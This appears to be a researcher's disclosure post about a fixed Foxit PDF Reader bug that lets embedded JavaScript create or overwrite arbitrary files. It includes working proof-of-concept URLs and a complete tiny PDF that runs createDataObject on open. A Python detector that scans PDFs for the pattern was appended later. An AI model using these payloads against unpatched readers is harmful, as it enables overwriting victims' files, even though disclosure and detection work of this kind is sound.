Dangerous file write bug in Foxit PDF Reader

This is fixed in the recently released Foxit PDF Reader v4.3.1.0218. That release is marked as an important security update, although this file bug is not mentioned.

Recently, I've been playing around with the various JavaScript APIs available in various different PDF readers. In case you wanted to do the same, I made some little tools, including a simple one to execute PDF-based JS via a URL:

https://cevans-app.appspot.com/static/pdfjs.html?js=app.alert('hi')

The serious bug I found in Foxit PDF Reader permits arbitrary files to be written with arbitrary content, like this:

https://cevans-app.appspot.com/static/pdfjs.html?js=createDataObject('c:/autoexec.bat','echo hi mom')

Files can be overwritten as well as created.

I did some hackery on the generated PDF and managed to squeeze a full valid PDF, including a simple JS payload, into 136 characters. This means I can tweet the full PoC PDF, which I will do shortly :) Here it is for completeness:

%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (createDataObject\('c:/pwn','pwn'\))>> trailer<</Root 1 0 R>>
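A triage check for the pattern shown above, added here as an example and not part of the original post: it resolves the /OpenAction reference, decodes the /JS literal string, and reports any createDataObject call with its target path. It scans with regular expressions because the PoC has no xref table or endobj markers; the names scan and literal_string and the BENIGN sample are assumptions made for this example.

```python
import re

# Tolerant "N G obj <body>" matcher: the page's PoC has no endobj or xref,
# so each body ends at the next object header, the trailer, or end of file.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)(?=\d+\s+\d+\s+obj|trailer|\Z)", re.S)
OPEN_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R")  # indirect references only
RISKY_RE = re.compile(r"createDataObject\s*\(\s*(['\"])(.*?)\1")

# The 136-character PoC quoted on this page, used as detector input.
POC = rb"%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (createDataObject\('c:/pwn','pwn'\))>> trailer<</Root 1 0 R>>"
# Constructed sample: same layout, script only calls app.alert.
BENIGN = rb"%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (app.alert\('hi'\))>> trailer<</Root 1 0 R>>"


def literal_string(body, start):
    """Decode the PDF literal string whose '(' is at body[start]."""
    out, depth, i = bytearray(), 0, start
    while i < len(body):
        c = body[i:i + 1]
        if c == b"\\" and i + 1 < len(body):
            out += body[i + 1:i + 2]  # simplified: keeps the escaped byte, enough for \( \) \\
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                break  # matching close of the outer string
        if not (c == b"(" and depth == 1):  # drop only the opening paren
            out += c
        i += 1
    return out.decode("latin-1")


def scan(pdf):
    """Return one finding per createDataObject call in JavaScript run on open."""
    objects = {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}
    findings = []
    for m in OPEN_RE.finditer(pdf):
        num = int(m.group(1))
        body = objects.get(num, b"")
        js_at = re.search(rb"/S\s*/JavaScript.*?/JS\s*\(", body, re.S)
        if not js_at:
            continue
        script = literal_string(body, js_at.end() - 1)
        for call in RISKY_RE.finditer(script):
            findings.append({"object": num, "path": call.group(2), "script": script})
    return findings
```

This only sees uncompressed objects; a script held in a compressed stream or object stream has to be inflated before scanning.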